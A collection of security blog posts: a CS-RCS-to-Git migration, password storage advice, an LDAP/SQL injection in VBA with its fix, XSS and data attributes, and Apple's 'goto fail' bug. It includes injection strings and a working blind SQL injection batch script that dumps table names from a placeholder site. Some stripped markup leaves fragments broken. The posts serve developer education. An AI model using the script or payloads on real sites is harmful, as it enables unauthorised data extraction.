In which I move my version control from ComponentSoftware’s CS-RCS Pro to Git while preserving commit history.
[If you don’t want the back story, click here for the instructions!]
OK, so having watched the video I linked to earlier, I thought I’d move some of my old projects to Git.
I picked one at random, and went looking for tools.
I’m hampered a little by the fact that all my old projects used ComponentSoftware’s “CS-RCS Pro”.
A couple of really good reasons:
But you know who doesn’t use CS-RCS Pro any more?
That’s right, ComponentSoftware.
It’s a dead platform, unsupported, unpatched, and belongs off my systems.
One simple reason – if I move off the platform, I face the usual choice when migrating from one version control system to another:
The second option seems a bit of a waste to me.
OK, so yes, technically I could mix the two modes, by using CS-RCS Pro to browse the ancient history when I need to, and Git to browse recent history, after starting Git from a clean working folder. But I could see a couple of problems:
So, really, I wanted to make sure that I could move my files, history and all.
I really didn’t have a good way to do it.
Clearly, any version control system can be moved to any other version control system by the simple expedient of:
But, as you can imagine, that’s really long-winded and manual. That should be automatable.
In fact, given the shared APIs of VSS-compatible source control services, I’m truly surprised that nobody has yet written a tool to do basically this task. I’d get on it myself, but I have other things to do. Maybe someone will write a “VSS2Git” or “VSS2VSS” toolkit to do just this.
There is a format for creating a single-file copy of a Git repository, which Git can process using the command “git fast-import”. So all I have to find is a tool that goes from a CS-RCS repository to the fast-import file format.
So, clearly there’s no tool to go from CS-RCS Pro to Git. There’s a tool to go from CS-RCS Pro to CVS, or there was, but that was on the now-defunct CS-RCS web site.
But… Remember I said that it’s compatible with GNU RCS.
And there’s scripts to go from GNU RCS to Git.
OK, so the script for this is written in Ruby, and as I read it, there seemed to be a few things that made it look like it might be for Linux only.
I really wasn’t interested in making a Linux VM (easy though that may be) just so I could convert my data.
Everything changed with the arrival of the recent Windows 10 Anniversary Update, because along with it came a new component.
Bash on Ubuntu on Windows.
It’s like a Linux VM, without needing a VM, without having to install Linux, and it works really well.
With this, I could get all the tools I needed – GNU RCS, in case I needed it; Ruby; Git command line – and then I could try this out for myself.
Of course, I wouldn’t be publishing this if it wasn’t somewhat successful. But there are some caveats, OK?
I’ve tried this a few times, on ONE of my own projects. This isn’t robustly tested, so if something goes all wrong, please by all means share, and people who are interested (maybe me) will probably offer suggestions, some of them useful. I’m not remotely warrantying this or suggesting it’s perfect. It may wipe your development history out of your one and only copy of version control… so don’t do it on your one and only copy. Make a backup first.
GNU RCS likes to store files in one of two places – either in the same directory as the working files, but with a “,v” pseudo-extension added to the filename, or in a sub-directory off each working folder, called “RCS” and with the same “,v” extension on the files. If you did either of these things, there’s no surprises. But…
CS-RCS Pro doesn’t do this. It has a separate RCS Repository Root. I put mine in C:\RCS, but you may have yours somewhere else. Underneath that RCS Repository Root is a full tree of the drives you’ve used CS-RCS to store (without the “:”), and a tree under that. I really hope you didn’t embed anything too deep, because that might bode ill.
Initially, this seemed like a bad thing, but because you don’t actually need the working files for this task, you can pretend that the RCS Repository is actually your working space.
Maybe this is obvious, but it took me a moment of thinking to decide I didn’t have to move files into RCS sub-folders of my working directories.
Make this a “flag day”. After you do this conversion, never use CS-RCS Pro again. It was good, and it did the job, and it’s now buried in the garden next to Old Yeller. Do not sprinkle the zombification water on that hallowed ground to revive it.
This also means you MUST check in all your code before converting, because checking it in afterwards will be … difficult.
Assumption: You have Windows 10.
This might look like a lot of instructions, but I mostly just wanted to be clear. This is really quick work. If you screw up after the “git init” command, simply “rm –rf .git” to remove the new repository.
I hate when people ask me this question, because I inevitably respond with a half-dozen questions of my own, which makes me seem like a bit of an arse.
To reduce that feeling, because the questions don’t seem to be going away any time soon, I thought I’d write some thoughts out.
Passwords are important objects – and because people naturally share IDs and passwords across multiple services, your holding on to a customer’s / user’s password means you are a necessary part of that user’s web of credential storage.
It will be a monumental news story when your password database gets disclosed or leaked, and even more of a story if you’ve chosen a bad way of protecting that data. You will lose customers and you will lose business; you may even lose your whole business.
Take a long hard look at what you’re doing, and whether you actually need to be in charge of that kind of risk.
If you are going to verify a user, you don’t need encrypted passwords, you need hashed passwords. And those hashes must be salted. And the salt must be large and random. I’ll explain why some other time, but you should be able to find much documentation on this topic on the Internet. Specifically, you don’t need to be able to decrypt the password from storage, you need to be able to recognise it when you are given it again. Better still, use an acknowledged good password hashing mechanism like PBKDF2. (Note, from the “2” that it may be necessary to update this if my advice is more than a few months old)
Now, do not read the rest of this section – skip to the next question.
Seriously, what are you doing reading this bit? Go to the heading with the next question. You don’t need to read the next bit.
OK, if you are determined that you will have to impersonate a user (or a service account), you might actually need to store the password in a decryptable form.
First make sure you absolutely need to do this, because there are many other ways to impersonate an incoming user using delegation, etc, which don’t require you storing the password.
Explore delegation first.
Finally, if you really have to store the password in an encrypted form, you have to do it incredibly securely. Make sure the key is stored separately from the encrypted passwords, and don’t let your encryption be brute-forcible. A BAD way to encrypt would be to simply encrypt the password using your public key – sure, this means only you can decrypt it, but it means anyone can brute-force an encryption and compare it against the ciphertext.
A GOOD way to encrypt the password is to add some entropy and padding to it (so I can’t tell how long the password was, and I can’t tell if two users have the same password), and then encrypt it.
Password storage mechanisms such as keychains or password vaults will do this for you.
If you don’t have keychains or password vaults, you can encrypt using a function like Windows’ CryptProtectData, or its .NET equivalent, System.Security.Cryptography.ProtectedData.
[Caveat: CryptProtectData and ProtectedData use DPAPI, which requires careful management if you want it to work across multiple hosts. Read the API and test before deploying.]
[Keychains and password vaults often have the same sort of issue with moving the encrypted password from one machine to another.]
For .NET documentation on password vaults in Windows 8 and beyond, see: Windows.Security.Credentials.PasswordVault
For non-.NET on Windows from XP and later, see: CredWrite
For Apple, see documentation on Keychains
If you’re protecting data in a business, you can probably tell users how strong their passwords must be. Look for measures that correlate strongly with entropy – how long is the password, does it use characters from a wide range (or is it just the letter ‘a’ repeated over and over?), is it similar to any of the most common passwords, does it contain information that is obvious, such as the user’s ID, or the name of this site?
Maybe you can reward customers for longer passwords – even something as simple as a “strong account award” sticker on their profile page can induce good behaviour.
Length is mathematically more important to password entropy than the range of characters. An eight character password chosen from 64 characters (less than three hundred trillion combinations – a number with 4 commas) is weaker than a 64 character password chosen from eight characters (a number of combinations with 19 commas in it).
An 8-character password taken from 64 possible characters is actually as strong as a password only twice as long and chosen from 8 characters – this means something like a complex password at 8 characters in length is as strong as the names of the notes in a couple of bars of your favourite tune.
Allowing users to use password safes of their own makes it easier for them to use longer and more complex passwords. This means allowing copy and paste into password fields, and where possible, integrating with any OS-standard password management schemes
Everything seems to default to sending a password reset email. This means your users’ email address is equivalent to their credential. Is that strength of association truly warranted?
In the process to change my email address, you should ask me for my password first, or similarly strongly identify me.
What happens when I stop paying my ISP, and they give my email address to a new user? Will they have my account on your site now, too?
Every so often, maybe you should renew the relationship between account and email address – baselining – to ensure that the address still exists and still belongs to the right user.
Password hints push you dangerously into the realm of actually storing passwords. Those password hints must be encrypted as well as if they were the password themselves. This is because people use hints such as “The password is ‘Oompaloompah’” – so, if storing password hints, you must encrypt them as strongly as if you were encrypting the password itself. Because, much of the time, you are. And see the previous rule, which says you want to avoid doing that if at all possible.
How do you enforce occasional password changes, and why?
What happens when a user changes their password?
What happens when your password database is leaked?
What happens when you need to change hash algorithm?
Every so often, I write about some real-world problems in this blog, rather than just getting excited about generalities. This is one of those times.
I had a list of users the other day, exported from a partner with whom we do SSO, and which somehow had some duplicate entries in.
These were not duplicate in the sense of “exactly the same data in every field”, but differed by email address, and sometimes last name. Those of you who manage identity databases will know exactly what I’m dealing with here – people change their last name, through marriage, divorce, adoption, gender reassignment, whim or other reason, and instead of editing the existing entry, a new entry is somehow populated to the list of identities.
What hadn’t changed was that each of these individuals still held their old email address in Active Directory, so all I had to do was look up each email address, relate it to a particular user, and then pull out the canonical email address for that user. [In this case, that’s the first email address returned from AD]
A quick search on the interwebs gave me this as a suggested VBA function to do just that:
1: Function GetEmail(email as String) as String
2: ' Given one of this users' email addresses, find the canonical one.
4: ' Find our default domain base to search from
5: Set objRootDSE = GetObject("LDAP://RootDSE")
6: strBase = "'LDAP://" & objRootDSE.Get("defaultNamingContext") & "'"
8: ' Open a connection to AD
9: Set ADOConnection = CreateObject("ADODB.Connection")
10: ADOConnection.Provider = "ADsDSOObject"
11: ADOConnection.Open "Active Directory Provider"
13: ' Create a command
14: Set ADCommand = CreateObject("ADODB.Command")
15: ADCommand.ActiveConnection = ADOConnection
17: 'Find user based on their email address
18: ADCommand.CommandText = _
19: "SELECT distinguishedName,userPrincipalName,mail FROM " & _
20: strBase & " WHERE objectCategory='user' and mail='" & email & "'"
22: ' Execute this command
23: Set ADRecordSet = ADCommand.Execute
25: ' Extract the canonical email address for this user.
26: GetEmail = ADRecordSet.Fields("Mail")
28: ' Return.
29: End Function
That did the trick, and I stopped thinking about it. Printed out the source just to demonstrate to a couple of people that this is not rocket surgery.
Yesterday the printout caught my eye. Here’s the particular line that made me stop:
18: ADCommand.CommandText = _
19: "SELECT distinguishedName,userPrincipalName,mail FROM " & _
20: strBase & " WHERE objectCategory='user' AND mail='" & email & "'"
That looks like a SQL query, doesn’t it?
Probably because it is.
It’s one of two formats that can be used to query Active Directory, the other being the less-readable LDAP syntax.
Both formats have the same problem – when you build the query using string concatenation like this, it’s possible for the input to give you an injection by escaping from the data and into the code.
I checked this out – when I called this function as follows, I got the first email address in the list as a response:
1: Debug.Print GetEmail("x' OR mail='*")
You can see my previous SQL injection articles to come up with ideas of other things I can do now that I’ve got the ability to inject.
Normally, I’d suggest developers use Parameterised Queries to solve this problem – and that’s always the best idea, because it not only improves security, but it actually makes the query faster on subsequent runs, because it’s already optimised. Here’s how that ought to look:
1: ADCommand.CommandText = _
2: "SELECT distinguishedName,userPrincipalName,mail FROM " & _
3: strBase & "WHERE objectCategory='user' AND mail=?"
5: 'Create and bind parameter
6: Set ADParam = ADCommand.CreateParameter("", adVarChar, adParamInput, 40, email)
7: ADCommand.Parameters.Append ADParam
That way, the question mark “?” gets replaced with “’email@example.com’” (including the single quote marks) and my injection attempt gets quoted in magical ways (usually, doubling single-quotes, but the parameter insertion is capable of knowing in what way it’s being inserted, and how exactly to quote the data).
That’s the rather meaningful message:
Run-time error ‘-2147467262 (80004002)’:
No such interface supported
It doesn’t actually tell me which interface is supported, so of course I spend a half hour trying to figure out what changed that might have gone wrong – whether I’m using a question mark where perhaps I might need a named variable, possibly preceded by an “@” sign, but no, that’s SQL stored procedures, which are almost never the SQL injection solution they claim to be, largely because the same idiot who uses concatenation in his web service also does the same stupid trick in his SQL stored procedures, but I’m rambling now and getting far away from the point if I ever had one, so…
The interface that isn’t supported is the ability to set parameters.
The single best solution to SQL injection just plain isn’t provided in the ADODB library and/or the ADsDSOObject provider.
Why on earth would you miss that out, Microsoft?
So, the smart answer here is input validation where possible, and if you absolutely have to accept any and all input, you must quote the strings that you’re passing in.
In my case, because I’m dealing with email addresses, I think I can reasonably restrict my input to alphanumerics, the “@” sign, full stops, hyphens and underscores.
Input validation depends greatly on the type of your input. If it’s a string, that will need to be provided in your SQL request surrounded with single quotes – that means that any single quote in the string will need to be encoded safely. Usually that means doubling the quote mark, although you might choose to replace them with double quotes or back ticks.
If your input is a number, you can be more restrictive in your input validation – only those characters that are actually parts of a number. That’s not necessarily as easy as it sounds – the letter “e” is often part of numbers, for instance, and you have to decide whether you’re going to accept bases other than 10. But from the perspective of securing against SQL injection, again that’s not too difficult to enforce.
Finally, of course, you have to decide what to do when bad input comes in – an error response, a static value, throw an exception, ignore the input and refuse to respond, etc. If you choose to signal an error back to the user, be careful not to provide information an attacker could find useful.
Sometimes the mere presence of an error is useful.
Certainly if you feed back to the attacker the full detail of the SQL query that went wrong – and people do sometimes do this! – you give the attacker far too much information.
Even feeding back the incorrect input can be a bad thing in many cases. In the Excel case I’m running into, that’s probably not easily exploitable, but you probably should be cautious anyway – if it’s an attacker causing an error, they may want you to echo back their input to exploit something else.
Seriously, Microsoft, this is an unforgiveable lapse – not only is there no ability to provide the single best protection, because you didn’t implement the parameter interface, but also your own samples provide examples of code that is vulnerable to SQL injections. [Here and here – the other examples I was able to find use hard-coded search filters.]
Microsoft, update your samples to demonstrate how to securely query AD through the ADODB library, and consider whether it’s possible to extend the provider with the parameter interface so that we can use the gold-standard protection.
Parse your parameters – make sure they conform to expected values. Complain to the user when they don’t. Don’t use lack of samples as a reason not to deliver secure components.
And, because I know a few of you will hope to copy directly from my code, here’s how I wound up doing this exact function.
Please, by all means review it for mistakes – I don’t guarantee that this is correct, just that it’s better than I found originally. For instance, one thing it doesn’t check for is if the user actually has a value set for the “mail” field in Active Directory – I can tell you for certain, it’ll give a null reference error if you have one of these users come back from your search.
1: Function GetEmail(email As String) As String
2: ' Given one of this users' email addresses, find the canonical one.
4: ' Pre-execution input validation - email must contain only recognised characters.
5: If email Like "*[!a-zA-Z0-9_@.]*" Then
6: GetEmail = "Illegal characters"
7: Exit Function
8: End If
11: ' Find our default domain base to search from
12: Set objRootDSE = GetObject("LDAP://RootDSE")
13: strBase = "'LDAP://" & objRootDSE.Get("defaultNamingContext") & "'"
15: ' Open a connection to AD
16: Set ADOConnection = CreateObject("ADODB.Connection")
17: ADOConnection.Provider = "ADsDSOObject"
18: ADOConnection.Open "Active Directory Provider"
20: ' Create a command
21: Set ADCommand = CreateObject("ADODB.Command")
22: ADCommand.ActiveConnection = ADOConnection
24: 'Find user based on their email address
25: ADCommand.CommandText = _
26: "SELECT distinguishedName,userPrincipalName,mail FROM " & _
27: strBase & " WHERE objectCategory='user' AND mail='" & email & "'"
29: ' Execute this command
30: Set ADrecordset = ADCommand.Execute
32: ' Post execution validation - we should have exactly one answer.
33: If ADrecordset Is Nothing Or (ADrecordset.EOF And ADrecordset.BOF) Then
34: GetEmail = "Not found"
35: Exit Function
36: End If
37: If ADrecordset.RecordCount > 1 Then
38: GetEmail = "Many matches"
39: Exit Function
40: End If
42: ' Extract the canonical email address for this user.
43: GetEmail = ADrecordset.Fields("Mail")
45: ' Return.
46: End Function
As always, let me know if you find this at all useful.
Version control is one of those vital tools for developers that everyone has to use but very few people actually enjoy or understand.
So, it’s with no surprise that I noted a few months ago that the version control software on which I’ve relied for several years for my personal projects, Component Software’s CS-RCS, has not been built on in years, and cannot now be downloaded from its source site. [Hence no link from this blog]
I’ve used git before a few times in professional projects while I was working at Amazon, but relatively reluctantly – it has incredibly baroque and meaningless command-line options, and gives the impression that it was written by people who expected their users to be just as proficient with the ins and outs of version control as they are.
While I think it’s a great idea for developers to build software they would use themselves, I think it’s important to make sure that the software you build is also accessible by people who aren’t the same level of expertise as yourself. After all, if your users were as capable as the developer, they would already have built the solution for themselves, so your greater user-base comes from accommodating novices to experts with simple points of entry and levels of improved mastery.
git, along with many other open source, community-supported tools, doesn’t really accommodate the novice.
As such, it means that most people who use it rely on “cookbooks” of sets of instructions. “If you want to do X, type commands Y and Z” – without an emphasis on understanding why you’re doing this.
This leads inexorably to a feeling that you’re setting yourself up for a later fall, when you decide you want to do an advanced task, but discover that a decision you’ve made early on has prevented you from doing the advanced task in the way you want.
That’s why I’ve been reluctant to switch to git.
But it’s clear that git is the way forward in the tools I’m most familiar with – Visual Studio and its surrounding set of developer applications.
It’s one of those decisions I’ve made some time ago, but not enacted until now, because I had no idea how to start – properly. Every git repository I’ve worked with so far has either been set up by someone else, or set up by me, based on a cookbook, for a new project, and in a git environment that’s managed by someone else. I don’t even know if those terms, repository and environment, are the right terms for the things I mean.
There are a number of advanced things I want to do from the very first – particularly, I want to bring my code from the old version control system, along with its history where possible, into the new system.
And I have a feeling that this requires I understand the decisions I make when setting this up.
So, it was with much excitement that I saw a link to this arrive in my email:
Next thing is I’m going to watch this, and see how I’m supposed to work with git. I’ll let you know how it goes.
I happened upon a blog post by the Office team yesterday which surprised me, because it talked about a feature in PowerPoint that I’ve wanted ever since I first got my Surface 2.
Here’s a link to documentation on how to use this feature in PowerPoint.
It seems like the obvious feature a tablet should have.
Here’s a video of me using it to draw a few random shapes:
But not just in PowerPoint – this should be in Word, in OneNote, in Paint, and pretty much any app that accepts ink.
So here’s the blog post from Office noting that this feature will finally be available for OneNote in November.
On iPad, iPhone and Windows 10. Which I presume means it’ll only be on the Windows Store / Metro / Modern / Immersive version of OneNote.
That’s disappointing, because it should really be in every Office app. Hell, I’d update from Office 2013 tomorrow if this was a feature in Office 2016!
Please, Microsoft, don’t stop at the Windows Store version of OneNote.
Shape recognition, along with handwriting recognition (which is apparently also hard), should be a natural part of my use of the Surface Pen. It should work the same across multiple apps.
That’s only going to happen if it’s present in multiple apps, and is a documented API which developers – of desktop apps as well as Store apps – can call into.
Well, desktop apps can definitely get that.
I’ll admit that I haven’t had the time yet to build my own sample, but I’m hoping that this still works – there’s an API called “Ink Analysis”, which is exactly how you would achieve this in your app:
It allows you to analyse ink you’ve captured, and decide if it’s text or a drawing, and if it’s a drawing, what kind of drawing it might be.
[I’ve marked this with the tag “Alun’s Code” because I want to write a sample eventually that demonstrates this function.]
First, a disclaimer for the TL;DR crowd – data attributes alone will not stop all XSS, mine or anyone else’s. You have to apply them correctly, and use them properly.
However, I think you’ll agree with me that it’s a great way to store and reference data in a page, and that if you only handle user data in correctly encoded data attributes, you have a greatly-reduced exposure to XSS, and can actually reduce your exposure to zero.
Next, a reminder about my theory of XSS – that there are four parts to an XSS attack – Injection, Escape, Attack and Cleanup. Injection is necessary and therefore can’t be blocked, Attacks are too varied to block, and Cleanup isn’t always required for an attack to succeed. Clearly, then, the Escape is the part of the XSS attack quartet that you can block.
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
Let’s suppose that “SEARCH-STRING” above is the string for which I searched.
I can inject my code as a search for:
The second line then becomes:
window.open() function, and by then it’s too late, because it’s already executed the bad thing. A more sensible language would have thrown an error at compile time, but this is just another reason for security guys to hate dynamic languages.
A data attribute is an attribute in an HTML tag, whose name begins with the word “data” and a hypen.
These data attributes can be on any HTML tag, but usually they sit in a tag which they describe, or which is at least very close to the portion of the page they describe.
Data attributes on table cells can be associated to the data within that cell, data attributes on a body tag can be associated to the whole page, or the context in which the page is loaded.
Because data attributes are HTML attributes, quoting their contents is easy. In fact, there’s really only a couple of quoting rules needed to consider.
&”) characters need to be HTML encoded to “
Rules 2 & 3 can simply be replaced with “HTML encode everything in the value other than alphanumerics” before applying rule 1, and if that’s easier, do that.
HTML parses attribute value strings very simply – look for the first non-space character after the “
=” sign, which is either a quote or not a quote. If it’s a quote, find another one of the same kind, HTML-decode what’s in between them, and that’s the attribute’s value. If the first non-space after the equal sign is not a quote, the value ends at the next space character.
Contemplate how these are parsed, and then see if you’re right:
<a onclick="prompt("1")"><a onclick="prompt("1")"></a>
<a onclick = "prompt( 1 )"><a onclick = "prompt( 1 )"></a>
<a onclick= prompt( 1 ) ><a onclick= prompt( 1 ) ></a>
<a onclick= prompt(" 1 ") ><a onclick= prompt(" 1 ") ></a>
<a onclick= prompt( "1" ) ><a onclick= prompt( "1" ) ></a>
<a onclick= "prompt( 1 )"><a onclick=&#9;"prompt( 1 )"></a>
<a onclick= "prompt( 1 )"><a onclick=&#32;"prompt( 1 )"></a>
<a onclick= thing=1;prompt(thing)><a onclick= thing=1;prompt(thing)></a>
<a onclick="prompt(\"1\")"><a onclick="prompt(\"1\")"></a>
Try each of them (they aren’t live in this document – you should paste them into an HTML file and open it in your browser), see which ones prompt when you click on them. Play with some other formats of quoting. Did any of these surprise you as to how the browser parsed them?
Here’s how they look in the Debugger in Internet Explorer 11:
Uh… That’s not right, particularly line 8. Clearly syntax colouring in IE11’s Debugger window needs some work.
OK, let’s try the DOM Explorer:
Much better – note how the DOM explorer reorders some of these attributes, because it’s reading them out of the Document Object Model (DOM) in the browser as it is rendered, rather than as it exists in the source file. Now you can see which are interpreted as attribute names (in red) and which are the attribute values (in blue).
Other browsers have similar capabilities, of course – use whichever one works for you.
Hopefully this demonstrates why you need to follow the rules of 1) quoting with double quotes, 2) encoding any ampersand, and 3) encoding any double quotes.
So, now if I use those data-attributes, my HTML includes a number of tags, each with one or more attributes named “
this” object to refer to the object on which the event is handled (so you may want to attach the
data-* attributes to the object which triggers the handler).
If you’re not inside of an event handler, or you want to get access to another tag, you should find the object representing the tag in some other way – usually
Once you have the object, you can query an attribute with the function
getAttribute(…) – the single argument is the name of the attribute, and what’s returned is a string – and any HTML encoding in the data-attribute will have been decoded once.
Other frameworks have ways of accessing this data attribute more easily – for instance, JQuery has a “
.data(…)” function which will fetch a data attribute’s value.
I’ve noted before that stopping XSS is a “simple” matter of finding where you allow injection, and preventing, in a logical manner, every possible escape from the context into which you inject that data, so that it cannot possibly become code.
If all the data you inject into a page is injected as HTML attribute values or HTML text, you only need to know one function – HTML Encode – and whether you need to surround your value with quotes (in a data-attribute) or not (in HTML text). That’s a lot easier than trying to understand multiple injection contexts each with their own encoding function. It’s a lot easier to protect the inclusion of arbitrary user data in your web pages, and you’ll also gain the advantage of not having multiple injection points for the same piece of data. In short, your web page becomes more object-oriented, which isn’t a bad thing at all.
You can still kick your own arse.
When converting user input from the string you get from
getAttribute to a numeric value, what function are you going to use?
Please don’t say “
Eval is evil. Just like
document.write, its use is an invitation to Cross-Site Scripting.
parseInt(), because they won’t evaluate function calls or other nefarious components in your strings.
So, now I’m hoping your Omniture script looks like this:
<div id="myDataDiv" data-search-term="SEARCH-STRING"></div>
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
You didn’t forget to HTML encode your SEARCH-STRING, or at least its quotes and ampersands, did you?
P.S. Omniture doesn’t cause XSS, but many people implementing its required calls do.
But then, I’m hacking your website because of a 15-year-old flaw.
It’s been noted for some time that I love playing with XSS, simply because it’s so widespread, and because it’s an indication of the likely security stance of the rest of the website.
But if XSS is important because it’s widely spread, it’s got a relatively low impact.
Slightly less widely spread, but often the cause of far greater damage, is SQL injection.
I’ll talk some more later about how SQL injection happens, but for now a quick demonstration of the power of SQL injection.
Every demonstration of SQL injection I’ve ever seen includes this example:
sqlCommandString = "SELECT userid FROM users WHERE userid='" + inputID + "' AND password='" + inputPass + "'"
And of course, the trick here is to supply the user ID “
admin” and the password “
' OR 1='1”.
Sure, IF you have that code in your app, that will let the user in as admin.
But then, IF you have that code in your app, you have many bigger problems than SQL injection – because your user database contains unprotected passwords, and a leak will automatically tell the world how poor your security is, and always has been.
More likely, if you have SQL injection in the logon code at all, is that you will have code like this:
sqlCommandString = "SELECT userid, password FROM users WHERE userid='" + inputID + "'"
… execute sqlCommandString …
… extract salt …
… hash incoming password …
… compare salted hash of incoming password against stored password …
Again, if you were to have designed poorly, you might allow for multiple user records to come back (suppose, say, you allow the user to reuse old passwords, or old hashing algorithms), and you accept the first account with the right password. In that case, yes, an attacker could hack the login page with a common password, and the user ID “
' OR userid LIKE '%” – but then the attacker would have to know the field was called userid, and they’re only going to get the first account in your database that has that password.
Doubtless there are many login pages which are vulnerable to SQL injection attacks like this, but they are relatively uncommon where developers have some experience or skill.
Where do you use a SQL-like database?
Anywhere there’s a table of data to be queried, whether it’s a dictionary of words, or a list of popular kitchen repair technicians, etc, etc.
Imagine I’ve got a dictionary searching page, weblexicon.example (that doesn’t exist, nor does weblexicon.com). Its main page offers me a field to provide a word, for which I want to see the definition.
If I give it a real word, it tells me the definition(s).
If I give it a non-existent word, it apologises for being unable to help me.
Seems like a database search is used here. Let’s see if it’s exploitable, by asking for “example’” – that’s “example” with an extra single quote at the end.
That’s pretty cool – we can tell now that the server is passing our information off to a MySQL server. Those things that look like double-quotes around the word ‘example’ are in fact two single-quotes. A bit confusing, but it helps to understand what’s going on here.
So, let’s feed the web lexicon a value that might exploit it. Sadly, it doesn’t accept multiple commands, and gives the “You have an error in your SQL syntax” message when I try it.
Worse still, for some reason I can’t use the “UNION” or “JOIN” operators to get more data than I’m allowed. This seems to be relatively common when there are extra parentheses, or other things we haven’t quite guessed about the command.
That means we’re stuck with Blind SQL injection. With a blind SQL injection, or Blind SQLi, you can generally see whether a value is true or false, by the response you get back. Remember our comparison of a word that does exist and a word that doesn’t? Let’s try that in a query to look up a true / false value:
So now, we can ask true / false questions against the database.
Seems rather limiting.
Let’s say we’re looking to see if the MySQL server is running a particular vulnerable version – we could ask for “example’ and @@version=’220.127.116.11” – a true response would give us the hint that we can exploit that vulnerability.
But the SQL language has so many other options. We can say “does your version number begin with a ‘4’”
A bit more exciting, but still pedestrian.
What if I want to find out what the currently executing statement looks like? I could ask “is it an ‘a’? a ‘b’? a ‘c’?” and so on, but that is too slow.
Instead, I could ask for each bit of the characters, and that’s certainly a good strategy – but the one I chose is to simply do a binary search, which is computationally equivalent.
A fifteen-year-old vulnerability (SQL injection is older than that, but I couldn’t do the maths) deserves the same age of language to write my attack in.
So I chose batch file and VBScript (OK, they’re both older than 15). Batch files can’t actually download a web page, so that’s the part I wrote in VBScript.
And the fun thing to dump would be all of the table names. That way, we can see what we have to play with.
So here you go, a simple batch script to do Blind Boolean SQL injection to list all the tables in the system.
echo wscript.echo chr(wscript.arguments(0)) > charout.vbs
@cscript htget.vbs //nologo http://weblexicon.example/definition.php?query=example'+and+((select+table_name+from+information_schema.tables+limit+1+offset+%lasti%)+like+'%stem%%%')+and+1='1 >%out%
@findstr /c:"1. [n" %out%> nul || (
if "!last!" lss "!last2!" (
set /a lasti=!lasti!+1
@set /a mid = (%lower% + %higher%) / 2
@cscript htget.vbs //nologo http://weblexicon.example/definition.php?query=example'+and+(ascii(substring((select+table_name+from+information_schema.tables+limit+1+offset+%lasti%)+from+%nchars%+for+1))+between+%lower%+and+%mid%)+and+1='1 >%out%
@set /a nqueries=%nqueries%+1
@findstr /c:"1. [n" %out%> nul && (
set /a mid=%lower%-1
@set /a lower=%mid%+1
@if %lower% EQU 127 goto donecheck
@if %lower% NEQ %higher% goto check
@if %lower% EQU 32 @(set found= )
@for /f %%a in ('cscript charout.vbs //nologo %lower%') do @set found=%%a
@rem echo . | set /p foo=%found: =+%
@set /a nchars=%nchars%+1
@echo %lasti%: %stem%
@rem (%nqueries% queries)
@set /a lasti=!lasti!+1
And the output (demonstrating that there are still some concurrency issues to take care of):
Yes, that’s all it takes.
If you’re a developer of a web app which uses a relational database back-end, take note – it’s exactly this easy to dump your database contents. A few changes to the batch file, and I’m dumping column names and types, then individual items from tables.
And that’s all assuming I’m stuck with a blind SQL injection.
The weblexicon site lists table contents as its definitions, so in theory I should be able to use a UNION or a JOIN to add data from other tables into the definitions it displays. It’s made easier by the fact that I can also access the command I’m injecting into, by virtue of MySQL including that in a process table.
Note that if I’m attacking a different site with a different injection point, I need to make two changes to my batch script, and I’m away. Granted, this isn’t exactly sqlmap.py, but then again, sqlmap.py doesn’t always find or exploit all the vulns that you have available.
The takeaways today:
The code in this article is for demonstration purposes – I’m not going to explain how it works, although it is very simple. The only point of including it is to show that a small amount of code can be the cause of a huge extraction of your site’s data, but can be prevented by a small change.
Don’t use this code to do bad things. Don’t use other code to do bad things. Bad people are doing bad things with code like this (and better) already. Do good things with this code, and keep those bad people out.
Last week, Apple released a security update for iOS, indicating that the vulnerability being fixed is one that allows SSL / TLS connections to continue even though the server should not be authenticated. This is how they described it:
Impact: An attacker with a privileged network position may capture or modify data in sessions protected by SSL/TLS
Description: Secure Transport failed to validate the authenticity of the connection. This issue was addressed by restoring missing validation steps.
Secure Transport is their library for handling SSL / TLS, meaning that the bulk of applications written for these platforms would not adequately validate the authenticity of servers to which they are connected.
Ignore “An attacker with a privileged network position” – this is the very definition of a Man-in-the-Middle (MITM) attacker, and whereas we used to be more blasé about this in the past, when networking was done with wires, now that much of our use is wireless (possibly ALL in the case of iOS), the MITM attacker can easily insert themselves in the privileged position on the network.
The other reason to ignore that terminology is that SSL / TLS takes as its core assumption that it is protecting against exactly such a MITM. By using SSL / TLS in your service, you are noting that there is a significant risk that an attacker has assumed just such a privileged network position.
Also note that “failed to validate the authenticity of the connection” means “allowed the attacker to attack you through an encrypted channel which you believed to be secure”. If the attacker can force your authentication to incorrectly succeed, you believe you are talking to the right server, and you open an encrypted channel to the attacker. That attacker can then open an encrypted channel to the server to which you meant to connect, and echo your information straight on to the server, so you get the same behaviour you expect, but the attacker can see everything that goes on between you and your server, and modify whatever parts of that communication they choose.
So this lack of authentication is essentially a complete failure of your secure connection.
As always happens when a patch is released, within hours (minutes?) of the release, the patch has been reverse engineered, and others are offering their description of the changes made, and how they might have come about.
In this case, the reverse engineering was made easier by the availability of open source copies of the source code in use. Note that this is not an intimation that open source is, in this case, any less secure than closed source, because the patches can be reverse engineered quickly – but it does give us a better insight into exactly the code as it’s seen by Apple’s developers.
if ((err = ReadyHash(&SSLHashSHA1, &hashCtx)) != 0) goto fail; if ((err = SSLHashSHA1.update(&hashCtx, &clientRandom)) != 0) goto fail; if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0) goto fail; if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0) goto fail; goto fail; if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0) goto fail;
Yes, that’s a second “goto fail”, which means that the last “if” never gets called, and the failure case is always executed. Because of the condition before it, however, the ‘fail’ label gets executed with ‘err’ set to 0.
So, of course, the Internet being what it is, the first reaction is to laugh at the clowns who made such a simple mistake, that looks so obvious.
T-shirts are printed with “goto fail; goto fail;” on them. Nearly 200 have been sold already (not for me – I don’t generally wear black t-shirts).
This is SSL code. You don’t get let loose on SSL code unless you’re pretty smart to begin with. You don’t get to work as a developer at Apple on SSL code unless you’re very smart.
Clearly “be smart” is already in evidence.
There is a possibility that this is too much in evidence – that the arrogance of those with experience and a track record may have led these guys to avoid some standard protective measures. The evidence certainly fits that view, but then many developers start with that perspective anyway, so in the spirit of working with the developers you have, rather than the ones you theorise might be possible, let’s see how to address this issue long term:
